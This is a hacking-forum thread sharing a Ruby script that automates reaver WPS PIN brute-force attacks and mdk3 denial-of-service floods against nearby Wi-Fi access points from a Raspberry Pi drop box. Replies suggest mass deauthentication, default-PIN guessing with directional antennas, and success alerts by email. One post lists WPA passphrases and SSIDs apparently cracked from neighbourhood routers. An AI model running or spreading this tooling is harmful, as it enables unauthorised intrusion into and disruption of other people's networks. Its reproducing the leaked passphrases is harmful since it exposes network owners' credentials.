Jump to content

(how to) reaver dropbox... raspberry pi...


i8igmac
 Share

Recommended Posts

So, i have decided to share one of my projects, i figure i wont get much attention with this script, witch is why im sharing...

i made a video i hope is quick to the point and informative... please share your comments... if there are any interested i may add some more functions to this script like capturing handshakes for cracking later...

all you need is a linux machine, a wireless adapter (the more the better)... ruby and a ruby requirement open3...

updated code...

require 'open3'
#on reboot stuff.

device=""
channel=""
ap_mac=""
essid=""
@device_list=["wlan1"]
@check=[]
#sleep 30 #sleep if you plan to start this script from startup.rc... give drives a chance to load
#`ifconfig wlan0 down`
#`iwconfig wlan0 mode monitor`
#`ifconfig wlan0 up`
`ifconfig wlan1 down`
`iwconfig wlan1 mode monitor`
`ifconfig wlan1 up`
#will not launch until the While true: at bottem
#reaver attack and log
def reaver(device, channel, ap_mac)
    Thread.start{
        #`ifconfig #{device} down`
        #`iwconfig #{device} mode monitor`
        #`ifconfig #{device} up`
        #puts "Random mac..."
        Open3.popen3("iwconfig #{device} channel #{channel}")
        puts "change #{channel}"
        Open3.popen3("ifconfig #{device} down")
        puts "down"
        #Open3.popen3("macchanger #{device} -r")
        puts "changemac"
        Open3.popen3("ifconfig #{device} up")
        puts "up"
        puts "reaver -i #{device} -vv -b #{ap_mac} -c #{channel}"
        Open3.popen3("reaver -i #{device} -vv -K 1 -b #{ap_mac} -c #{channel}"){|i,o,t,p|
            i.puts("y")  #tell reaver Yes to continue where the attack left off
            while line=o.gets
                if select([o],nil,nil,15)
                    puts "#{device} #{ap_mac}: #{line}"
                    log_all=File.open("log_all_#{ap_mac}",'a')
                    log_all.puts("#{device} #{ap_mac}: #{line}")
                    log_all.close

                    #100.00% complete
                    #Pin cracked in
                    #WPS PIN: '12345678'
                    #WPA PSK: 'asshole'
                    #AP SSID: 'noob'
                    # Log success to another file
                    if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:")
                        success=File.open("sucess_#{ap_mac}",'a')
                        success.puts("#{device} #{ap_mac}: #{line}")
                        success.close
                    end

                    if line.include?("WARNING: Failed to associate") || line.include?("WARNING: 25 successive start failures") || line.include?("Detected AP rate limiting") || line.include?("WARNING: 10 failed connections in a row")
                        puts "#{device} #{ap_mac}:                       killing thread"
                        @check.delete(device)#remove the card from the list... can now be used in a new process
                        Process.kill("KILL",p.pid)
                    end
                else
                    puts "#{device} #{ap_mac}:                       TIMEOUT"
                    @check.delete(device)
                    Process.kill("KILL",p.pid)
                    break
                end

            end
            @check.delete(device)
            Process.kill("KILL",p.pid)
        }
        @check.delete(device)
        Process.kill("KILL",p.pid)
    } #thread.start

end





#will not launch until the While true: at bottem
def mdk3(device, channel, ap_mac, essid)
    Open3.popen3("iwconfig #{device} channel #{channel}")
    Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
    Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
end #44:94:FC:3B:E9:16       7      ANDY DALTON SOUR HOUR
#28:C6:8E:A3:10:7A      11      NETGEAR01

#the main reason for this script
# if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart
#just added a few extra dos attacks

#reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6
#reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8

def gather()
scan_complete=false
while scan_complete==false
    @device_list.each{|wlan|
        if not @check.include?(wlan)
            puts "#{wlan} scanning with wash"
            buff=""
            Open3.popen3("wash -i #{wlan} -C"){|i,o,t,p| Thread.start{sleep 25; Process.kill("KILL",p.pid)}; while line=o.gets; if not line.nil?; buff<<line; end; end}
            @list=[]
            buff.encode!('UTF-8', 'binary', invalid: :replace, undef: :replace, replace: '').each_line{|x| if x.include?("No"); @list<<"#{x.split[1]} #{x.split[0]}"; end; }
            puts @list
            scan_complete=true
            break
        else
            puts "waiting for device to free up... redo"
            sleep 3
            next
        end
    }
end
end





try_again=false
    while true
        gather()
        @list.each{|stack|
        #puts "trying #{stack}"
            sleep 1
            @device_list.each{|wlan|
            
                if not @check.include?(wlan)
                    puts @check
                    @check<<wlan
                    #reaver("wlan2",       "6",                 "20:76:00:1C:D9:C8")
                    reaver("#{wlan.chomp}","#{stack.split[0]}", "#{stack.split[1]}")

                    try_again=false
                    break
                else
                    try_again=true

                end
            }

            if try_again==true
                redo
            end
        }

    end








Edited by i8igmac
Link to comment
Share on other sites

  • 7 months later...

I decided to open this scriptlast night and launch this attack. (In a controlled test environment of course)

in about 4 hours I have cracked 4 wireless access points... it really is a success! The way this algorithm controls reaver and can micro manage multiple alfa cards to quickly alternate threw a list of access points... set it and forget it... only need kali and a wifi card, the more the better!

I really need to work on my presentation...

EDIT: check the new script above and video

Link to comment
Share on other sites

Hey that's pretty neat right there I'm gonna check this out in a bit.

Like I said in your video comments you should try updating your script to work with the pixie dust attack.

Edited by ZaraByte
Link to comment
Share on other sites

Hey that's pretty neat right there I'm gonna check this out in a bit.

Like I said in your video comments you should try updating your script to work with the pixie dust attack.

ill look into this pixie dust attack. I may put this on a github... ill clean it up and correct the output... currently works well when I place this script in my /etc/rc.local... just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds...

Link to comment
Share on other sites

ill look into this pixie dust attack. I may put this on a github... ill clean it up and correct the output... currently works well when I place this script in my /etc/rc.local... just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds...

I'd like to know how you install open3 I've never messed with Ruby before so this is new to me I was planning to order me one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built in battery on it.

Link to comment
Share on other sites

I'd like to know how you install open3 I've never messed with Ruby before so this is new to me I was planning to order me one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built in battery on it.

I updated the script above, I didn't change mutch, you will notice on the reaver command -K 1

It seems that reaver is attacking the chip driver, K 1,2,3... I would think reaver is capable of detecting the wireless chip and performing this attack with out even declaring -K

I can't remember how I installed open 3.I believe installing Metasploit May include open 3

Gem install open3

Apt-cache search open3

there is a github I believe...

You can require ' /home/some/git/clone/location/open3.rb'

This device u posted, looks interesting... I'm interested in a device advertised on the kali home page, 'trim slice' runs on 12v.

Link to comment
Share on other sites

This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it.

This is right there with wifite for easy mode.

It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this?

Actually you could just put something like this into the script where the reaver wps attack fails.

Open3.popen3(wifite -b #{ap_mac})

This just looks right but I don't know ruby.

Edited by vailixi
Link to comment
Share on other sites

This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it.

This is right there with wifite for easy mode.

It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this?

Actually you could just put something like this into the script where the reaver wps attack fails.

Open3.popen3(wifite -b #{ap_mac})

This just looks right but I don't know ruby.

i have done this before, using 2 cards, set one card to log the handshakes, and another card to deauth all clients... i spent some time scripting all this kungfoo and was apart of my script, but turns out, i found a simply way...

airodump-ng wlan0

mdk3 wlan1 d (deauthenticate all clients from all access points)

Link to comment
Share on other sites

I don't remember exactly. It looks like it cycles threw all clients... I tested it for about a minute...

I should start a little tutorial on ruby automated wifi attacks... starting with a custom deauth attack using airebase...

Thread.start{Open3.popen3("airodump-ng -w log -d wlan1")}

This will start logging in plain text a csv file witch holds all the clients associated with a access point. All the information you need is easy access in ruby... just need to orginize everything and launch a attck of your choice...

Link to comment
Share on other sites

if you install open3 successfully, post your install method... I never had any problems but can't remember my install method

​Sure, ill try to set it today or tomorrow.

​I didn't code in ruby before but it seems like i need to add wlan2 here?

@device_list=["wlan1"]

​Not sure what syntax ruby uses to use multiple parameters?

​From code it seems like each wifi card trys to crack its own access point?

​In video i don't see script running mdk3 attack on access point but i see function for attack in script?

​Thanks for help, i just want to figure out how it actually works :)

Edited by IvanDoe
Link to comment
Share on other sites

Ok so i tried script via vmware, i do have raspberry around but figured i'd try it in vm first.

​I used kali 2, didn't have to install open3, worked out of the box, i just had to change interface name in script, wlan1/wlan2.

​Stoped it after few minutes but it seems to work cool, i'll set kali on raspberry and try it out as dropbox somewhere :)

​Anyway as i posted yesterday, alfa awus036neh seems to have driver issues or something else with kali 2.0 (monitor mode won't show any access points), so i used older awus036h with this script.

Link to comment
Share on other sites

Ok so i tried script via vmware, i do have raspberry around but figured i'd try it in vm first.

​I used kali 2, didn't have to install open3, worked out of the box, i just had to change interface name in script, wlan1/wlan2.

​Stoped it after few minutes but it seems to work cool, i'll set kali on raspberry and try it out as dropbox somewhere :)

​Anyway as i posted yesterday, alfa awus036neh seems to have driver issues or something else with kali 2.0 (monitor mode won't show any access points), so i used older awus036h with this script.

glad to see it worked for you... i figure it would work out of the box on a kali machine...

Update on my findings using one wireless card to attack multiple access points in a multi-threaded or multi-processed fashion... i did successfully crack a new device with this configuration...

@device_list=["mon0","mon1","mon2", "wlan1"]

i ran airmon-ng start wlan1 several times on a single wireless card to create multiple tab devices... then launched the script... this script is designed to micro manage multiple interfaces... i would like to see if any one abjects to this kind of setup... i have done this before in the past with other kinds of attacks...

Take a look at this scan of airodump...

airodump-ng wlan1 --essid-regex=my
 z0:4A:03:C3:D6:B5  -55       17        0    0  11  54 . WPA2 CCMP   PSK  myqwest6671                                  
 z8:39:44:5B:48:AC  -56       20        0    0   6  54e  WPA2 CCMP   PSK  myqwest6322                                  
 z0:26:88:E2:CF:28  -60        6        1    0  11  54e  WPA2 CCMP   PSK  myqwest3957                                  
 z0:24:7B:6F:A5:D4  -66        6        1    0  11  54   WPA2 CCMP   PSK  myqwest6947


airodump-ng wlan1 --essid-regex=HOME
 z4:04:15:0F:42:14  -48       11        0    0  11  54e  WPA2 CCMP   PSK  HOME-7EC8_EXT                                
 zC:35:40:75:38:99  -53       10        0    0   1  54e  WPA2 CCMP   PSK  HOME-3899                                    
 z8:7B:8C:26:EE:F5  -54        3        2    0   1  54e  WPA2 CCMP   PSK  HOME-051F_RE                                 
 z8:F7:C7:66:19:8F  -56       11        0    0  11  54e  WPA2 CCMP   PSK  HOME-198F                                    
 z0:71:C2:EF:7E:D0  -56       10        0    0  11  54e. WPA2 CCMP   PSK  HOME-06B1-2.4                                
 z4:AB:F0:11:D0:90  -62        4        0    0   6  54e  WPA2 CCMP   PSK  HOME-D092                                    
 z4:BE:F7:E8:BA:48  -63        4        0    0   6  54e. WPA2 CCMP   PSK  HOME-5AF7-2.4                                
 z0:1D:D4:8C:19:00  -63        5        0    0   6  54e  WPA2 CCMP   PSK  HOME-1902                                    
 z4:85:2A:97:9D:D8  -67        2        0    0   6  54e. WPA2 CCMP   PSK  HOME-7804-2.4
why would you think these routers share the same name? perhaps these are identical devices, identical firmware or ihardware issued by identical Internet service providers...

Look at these cracked pins... ill bet you money i can guess the default pin for all the routers above!

wlan1 z0:26:88:E2:CF:28: [+] WPS PIN: '12345670'
wlan1 z0:26:88:E2:CF:28: [+] WPA PSK: 'pupy20103251'
wlan1 z0:26:88:E2:CF:28: [+] AP SSID: 'myqwest3957'

wlan1 z0:71:C2:EF:7E:D0: [+] WPS PIN: '12345670'
wlan1 z0:71:C2:EF:7E:D0: [+] WPA PSK: '9H3TDTH9HVCPDT7Y'
wlan1 z0:71:C2:EF:7E:D0: [+] AP SSID: 'HOME-06B1-2.4'

mon1 z0:76:00:1C:D9:C8: [+] WPS PIN: '12345670'
mon1 z0:76:00:1C:D9:C8: [+] WPA PSK: 'i6bz7dd8s7haxt'
mon1 z0:76:00:1C:D9:C8: [+] AP SSID: 'myqwest4681'

wlan1 z8:39:44:5B:48:AC: [+] WPS PIN: '12345670'
wlan1 z8:39:44:5B:48:AC: [+] WPA PSK: '003368f2006dd11b8b052f0995'
wlan1 z8:39:44:5B:48:AC: [+] AP SSID: 'myqwest6322'

wlan2 z4:E0:C5:03:D9:23: [+] WPS PIN: '00000000'
wlan2 z4:E0:C5:03:D9:23: [+] WPA PSK: 'akDztnO2giB53LYSUr5JHUSQ4xJD78'
wlan2 z4:E0:C5:03:D9:23: [+] AP SSID: 'SEC_LinkShare_f50c6f'
So, try to imagine why reaver has failed to crack all these default pins...

SIGNAL STRENGTH!!!

the success packet holding all the gold just never made it to your machine and reaver reported a failed attack after long hours of work...

to build a successful attack, all i need is a list of default pins and a directinal antenna... Bobs your uncle... PeWnND lol

Edited by i8igmac
Link to comment
Share on other sites

Can I ask how many wireless cards your using I'd like to do a video on this and credit you in the video. Also which version of Kali Linux are you using for your Pi is it 2.0 or the older version of Kali Linux ARM.

Link to comment
Share on other sites

currently, my raspberry pi in my attack space, is running kali 1

updated reaver that includes pixiedust

Aircrack-ng 1.2 rc1 (i dont think it will matter)

how many cards do you have? my previous post i was successful with only using one card and creating multiple tap interfaces

mon0 mon1 mon2 mon3

there is a bit of a adjustment i need to make to better performance with this method...

Your better off running the script like below...

@device_list=ARGV[0]

change this line at the top of the script... open several terminals, and run like this... of course stop network managers and such...

ruby script.rb wlan0

ruby script.rb wlan1

ruby script.rb wlan2

ruby script.rb wlan4

ruby script.rb wlan5

there is so much to explain and i will fail to get the information out properly ,-)

different devices show different scan results, so, same goes for devices using different antennas...

i hope to get more time to modify things and help you create a better video!

i feel like a nerd talking to his labtop

Link to comment
Share on other sites

Not to familiar with ruby (something new to delve into), but would it be possible to add/modify the script to send an email on success to something like gmail which alongside a cell phone alert let's you know it's done?

Like in python

def send_email(user, pwd, recipient, subject, body):
    import smtplib

    gmail_user = user
    gmail_pwd = pwd
    FROM = user
    TO = recipient if type(recipient) is list else [recipient]
    SUBJECT = subject
    TEXT = body

    # Prepare actual message
    message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
    """ % (FROM, ", ".join(TO), SUBJECT, TEXT)
    try:
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        server.starttls()
        server.login(gmail_user, gmail_pwd)
        server.sendmail(FROM, TO, message)
        server.close()
        print 'successfully sent the mail'
    except:
        print "failed to send mail"

http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python

Working on something similar in python to automate attacks for Kali, and ideally suited for nethunter and potentially a bluetooth paired android smartwatch as well.

Edited by deadlyhabit
Link to comment
Share on other sites

I'm getting errors after pasting it in vi and trying to run this on net hunter.

root@kali:~# ./autopwn.rb
./autopwn.rb: line 1: require: command not found
./autopwn.rb: line 8: @device_list=[wlan1]: command not found
./autopwn.rb: line 9: @check=[]: command not found
./autopwn.rb: line 19: syntax error near unexpected token `('
./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)'

Would be nice if someone could make this into a bash script it be more compatible.

Link to comment
Share on other sites

I'm getting errors after pasting it in vi and trying to run this on net hunter.

root@kali:~# ./autopwn.rb
./autopwn.rb: line 1: require: command not found
./autopwn.rb: line 8: @device_list=[wlan1]: command not found
./autopwn.rb: line 9: @check=[]: command not found
./autopwn.rb: line 19: syntax error near unexpected token `('
./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)'

Would be nice if someone could make this into a bash script it be more compatible.
Nethunter is kali?

Root@kali:~#ruby autopwn.rb

@datahead I don't know much about reavers pixisust fuction. my understanding, k1 k2 k3 will target a specific chip driver?

Edited by i8igmac
Link to comment
Share on other sites

Nethunter is kali?

Root@kali:~#ruby autopwn.rb

Working now! was trying to run as a bash script running with ruby first works just fine no issues! Script works really nice but this script would be epic if someone converted it to a Bash script because then it might work on devices like the pineapple.

Link to comment
Share on other sites

I'm sure it can be done, I never bothered with bash... I chose ruby because metasploit developers chose ruby...

And I facking luv it!

It's be cool so see it as a bash script im not sure if you can install ruby on OpenWRT or not but I'd love to put this script on a TP-LINK MR3040 bad that be so awesome to use could but the only issue is wireless card sadly I found out the TP-LINK MR3040 needs a USB drive to hold files cause I don't think it has enough internal memory to hold a lot of stuff.

This ruby works fine on the Nexus 7 2013 WiFi tablet with nethunter 2.0 installed just need to follow deadlyhabit guide on getting monitor mode to work.

Edited by ZaraByte
Link to comment
Share on other sites

a quick search and I found ruby install guides for openwrt.

I believe in kali, openwrt has to many limitations... I plan on buying a new device to replace the pi... the amount of cords connected to my pi resembles a hot mess...

If I can eliminate the powered usb hub, maybe i can with a 12v orange slice?

Mobile is key

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...